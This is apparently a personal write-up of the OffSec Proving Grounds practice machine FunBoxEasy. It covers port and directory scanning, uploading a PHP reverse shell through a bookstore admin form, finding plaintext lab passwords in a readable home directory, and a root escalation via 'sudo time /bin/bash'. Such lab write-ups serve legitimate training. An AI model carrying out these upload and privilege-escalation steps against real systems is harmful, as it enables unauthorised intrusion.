Post

OffSec PG - FunBoxEasy

Posted
PG Artwork
PG Artwork
By Tanishq Rupaal 2 min read

Enumeration

Machine IP → 192.168.101.111

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.101.111

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.41 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.101.111 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • robots.txt
  • index.html
  • index.php
  • profile.php (302)
  • header.php
  • registration.php
  • logout.php
  • dashboard.php (302)
  • leftbar.php
  • forgot-password.php
  • hitcounter.txt
  • icons/ (403)
  • store/
  • admin/
  • secret/
  • gym/

Robots txt file contains the disallwed entry for gym, which was already found by gobuster.

Exploitation

Looking at the store directory, there is a book store with an admin login on the bottom of the page. This has the ability to add a new book which also has a file upload capability. This file is rendered as an image when visiting the book list via the publisher list. The publisher chosen for this was the Packt Publishing because it had 0 books.

The image being rendered can be navigated to separately at the location /store/bootstrap/img/test.php. The contents of the php file were first <?php echo "Hello Test"; ?> to test if the code is actually executed. This did execute upon visiting the aforementioned location, therefore, the code was replaced with the pentest monkey reverse shell.

This gives a reverse shell on the system when listening with netcat. This also gave the user flag.

Privilege Escalation

User

Looking at the /etc/passwd file, there are 2 users of interest → tony and root. Looking at the home directory of tony, it is readable by www-data. This directory had a password.txt file with the following contents →

1
2
3

ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin

The ssh password allows access to the machine as user tony.

Root

Looked at the sudo capabilities of the user tony. The interesting entries were whois, finger, time and cancel. Out of these, only time was the tool which was already installed. time is a command that runs the command passed to it and records the time it took for the command to execute. Since sudo operation is allowed on it, it may escalate privileges while executing the shell.

Therefore, sudo time /bin/bash gives the root shell and thus the root flag.

Lab Practice Notes, OffSec Proving Grounds
oscp lab offsec-proving-grounds
This post is licensed under CC BY 4.0 by the author.